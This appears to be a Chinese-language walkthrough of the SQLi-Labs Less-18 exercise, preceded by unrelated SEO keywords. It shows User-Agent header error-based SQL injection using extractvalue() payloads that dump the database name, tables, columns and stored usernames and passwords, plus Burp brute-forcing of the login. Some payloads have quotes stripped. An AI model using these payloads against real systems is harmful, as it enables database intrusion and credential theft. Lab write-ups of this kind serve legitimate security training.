如何做品牌网站设计,个人网站链接怎么做,成都网站制作软件,百度网页版入口官网报错注入中的head注入#xff08;less-18#xff09;
1.输入用户名和密码123 123显示登录错误 2.输入用户名和密码123’ 123显示登录错误 则证明不是普通报错注入#xff0c;因为有用户名和密码框#xff0c;如果不是普通报错注入则尝试head注入
3.用burp进行爆破#x…报错注入中的head注入less-18
1.输入用户名和密码123 123显示登录错误 2.输入用户名和密码123’ 123显示登录错误 则证明不是普通报错注入因为有用户名和密码框如果不是普通报错注入则尝试head注入
3.用burp进行爆破因为head注入需要登录成功后才能进行查询 用户名123密码0 因为对用户名进行爆破 结果为 同理也可使用密码admin对用户名进行爆破
4.抓出登录成功后的包 对每个地方进行尝试找出报错点
5.查找报错点
在User-Agent: 里面输入1 有回显 6.尝试在User-Agent里面输入内容进行爆破注入
1判断注入类型
输入User-Agent: 1 报错显示 near 127.0.0.1, admin) 说明是’)闭合
且应 写为(‘1’,’2’,’3’):其中1代表报错点2表示127.0.0.73表示admin
2查询数据库名
用User-Agent: 1and extractvalue(1,concat(~,(select database()),~)),123,123) -- s 查出 所以数据库名为security
3查询表名
User-Agent: 1and extractvalue(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),~)),123,123) -- s XPATH syntax error: ~emails,referers,uagents,users~
所以表名为emails,referers,uagents,users
4查询字段名
User-Agent: 1and extractvalue(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_schemasecurityand table_nameusers),~)),123,123) -- s XPATH syntax error: ~id,username,password~
所以字段名为id,username,password
5查询username和password
User-Agent: 1and extractvalue(1,concat(~,(select group_concat(username) from users))),123,123) -- s 查找出用户名为XPATH syntax error: ~Dumb,Angelina,Dummy,secure,stup
User-Agent: 1and extractvalue(1,concat(~,(select group_concat(password) from users))),123,123) -- s 查找出密码为XPATH syntax error: ~Dumb,I-kill-you,pssword,crappy